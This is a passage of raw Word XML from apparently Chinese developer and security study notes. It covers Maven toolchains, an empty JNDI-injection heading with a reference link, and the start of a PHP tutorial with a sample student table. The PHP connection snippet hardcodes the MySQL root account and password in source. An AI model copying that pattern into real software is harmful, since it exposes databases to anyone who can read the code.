    <w:p w14:paraId="6A931FFF" w14:textId="77777777" w:rsidR="0005027A" w:rsidRDefault="0005027A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="293F59FF" w14:textId="77777777" w:rsidR="0005027A" w:rsidRDefault="0005027A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>在某些情况下，你可能需要使用特定版本的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JDK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或其他工具进行构建。例如，你可能有一个项目需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JDK 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译，而另一个项目需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JDK 11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。在这种情况下，你可以在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> toolchains.xml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中为每个工具配置一个工具链，并为每个工具链指定所需的版本和路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6C55BD" w14:textId="77777777" w:rsidR="0005027A" w:rsidRDefault="0005027A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D222627" w14:textId="77777777" w:rsidR="0005027A" w:rsidRDefault="0005027A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Maven </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行构建时，它将查看项目的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> POM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> toolchains.xml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，以确定应该使用哪个工具链。如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> POM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件指定了一个工具链需求（例如，需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JDK 8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Maven </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将查找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> toolchains.xml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中配置的工具链，看看哪一个能够满足这个需求，并使用它进行构建。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421E6EA0" w14:textId="77777777" w:rsidR="0005027A" w:rsidRDefault="0005027A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2486BC67" w14:textId="77777777" w:rsidR="0005027A" w:rsidRDefault="0005027A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">toolchains.xml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件通常位于用户的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> home </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> .m2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录中，但也可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -t </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> --toolchains </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令行选项指定其位置。如果这个文件不存在，那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Maven </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将只使用默认的工具链，也就是运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Maven </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF691CF" w14:textId="77777777" w:rsidR="0005027A" w:rsidRDefault="0005027A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C001021" w14:textId="11449C9A" w:rsidR="00EA2318" w:rsidRDefault="0005027A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，工具链的使用是可选的，不是所有的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Maven </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目都需要它。只有在你需要管理和使用多个版本的构建工具时，才需要使用工具链。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402370F3" w14:textId="7358E8E1" w:rsidR="008A1949" w:rsidRDefault="008A1949" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="745" w:name="_Toc159780173"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JNDI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="745"/>
    </w:p>
    <w:p w14:paraId="3458AA18" w14:textId="10D84667" w:rsidR="008A1949" w:rsidRDefault="00B73883" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="00B73883">
        <w:t>https://tttang.com/archive/1611/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C847E4" w14:textId="77777777" w:rsidR="008A1949" w:rsidRDefault="008A1949" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12CEA3B4" w14:textId="77777777" w:rsidR="008A1949" w:rsidRDefault="008A1949" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F83017A" w14:textId="77777777" w:rsidR="008A1949" w:rsidRDefault="008A1949" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C5153AC" w14:textId="77777777" w:rsidR="008A1949" w:rsidRDefault="008A1949" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49F96AC2" w14:textId="77777777" w:rsidR="008A1949" w:rsidRDefault="008A1949" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F5B17A4" w14:textId="77777777" w:rsidR="008A1949" w:rsidRDefault="008A1949" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FBC530D" w14:textId="77777777" w:rsidR="008A1949" w:rsidRDefault="008A1949" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55DCEB3B" w14:textId="77777777" w:rsidR="008A1949" w:rsidRDefault="008A1949" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02EA4257" w14:textId="77777777" w:rsidR="008A1949" w:rsidRDefault="008A1949" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E3F67E7" w14:textId="77777777" w:rsidR="008A1949" w:rsidRDefault="008A1949" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C2D5D73" w14:textId="77777777" w:rsidR="008A1949" w:rsidRDefault="008A1949" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56A06852" w14:textId="77777777" w:rsidR="008A1949" w:rsidRDefault="008A1949" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36521B40" w14:textId="77777777" w:rsidR="008A1949" w:rsidRDefault="008A1949" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CC02DEE" w14:textId="77777777" w:rsidR="008A1949" w:rsidRDefault="008A1949" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="453BF25A" w14:textId="77777777" w:rsidR="008A1949" w:rsidRDefault="008A1949" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A59809D" w14:textId="77777777" w:rsidR="008A1949" w:rsidRDefault="008A1949" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DC1AD36" w14:textId="77777777" w:rsidR="008A1949" w:rsidRDefault="008A1949" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64957DDF" w14:textId="77777777" w:rsidR="008A1949" w:rsidRPr="008A1949" w:rsidRDefault="008A1949" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF26211" w14:textId="04E479B3" w:rsidR="00EA2318" w:rsidRDefault="0077554E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="746" w:name="_Toc159780174"/>
      <w:r>
        <w:t>PHP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="746"/>
    </w:p>
    <w:p w14:paraId="3DAE60AC" w14:textId="77777777" w:rsidR="0077554E" w:rsidRDefault="0077554E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ED926ED" w14:textId="66CA2CED" w:rsidR="0077554E" w:rsidRDefault="0077554E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="747" w:name="_Toc159780175"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>写简单的网页</w:t>
      </w:r>
      <w:bookmarkEnd w:id="747"/>
    </w:p>
    <w:p w14:paraId="3ECC9476" w14:textId="77777777" w:rsidR="0077554E" w:rsidRDefault="0077554E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="744DC1A4" w14:textId="5B1461FF" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="748" w:name="_Toc159780176"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建库建表导入数据</w:t>
      </w:r>
      <w:bookmarkEnd w:id="748"/>
    </w:p>
    <w:p w14:paraId="5BCD18DC" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>create table `teaching`.`self_table` (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663FA27C" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>`id` INT AUTO_INCREMENT PRIMARY KEY NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324964D6" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`stu_id` varchar(5) NOT NULL comment '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AE2DE6" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`name` varchar(20) NOT NULL comment '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>姓名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6923A752" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`email` varchar(50) comment '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>描述</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D6DBAB" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`idcard` varchar(18) NOT NULL comment '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>身份证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B5F1A9" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`score` INT NOT NULL comment '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67049F42" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375E9007" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41C82958" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>INSERT INTO `teaching`.`self_table` (`stu_id`, `name`, `email`, `idcard`, `score`) VALUES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E6F5C7" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> ('001', '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>张三</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>', 'Dumb@dhakkan.com', '140010199004210017', 80),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556FA0D8" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> ('002', '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>李四</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>', 'Angel@iloveu.com', '140010199004210012', 76),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367A583C" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> ('003', '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>王五</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>', 'Dummy@dhakkan.local', '140010199004210023', 84),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E97C081" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> ('004', '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>贾六</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>', 'secure@dhakkan.local', '140010199004210045', 73),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E77FD77" w14:textId="6EC0CC02" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> ('005', '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>杨七</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>', 'stupid@dhakkan.local', '140010199004210076', 92);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E0A23B" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="077F2858" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64681F2C" w14:textId="77777777" w:rsidR="00073335" w:rsidRPr="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40107E4D" w14:textId="4043E8E0" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="749" w:name="_Toc159780177"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接查询</w:t>
      </w:r>
      <w:bookmarkEnd w:id="749"/>
    </w:p>
    <w:p w14:paraId="6E5F71E9" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;?php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA1F359" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$dbhost = 'localhost'; // mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器主机地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06019958" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$dbuser = 'root'; // mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066469B0" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$dbpass = '1qaz@WSX'; // mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55373890" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$conn = mysqli_connect($dbhost, $dbuser, $dbpass); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4281CBEC" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0878EDE3" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证是否连接成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224AC614" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">if(! $conn ) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299DB1FA" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    die('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: ' . mysqli_error()); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C18CF4" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19492AE9" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
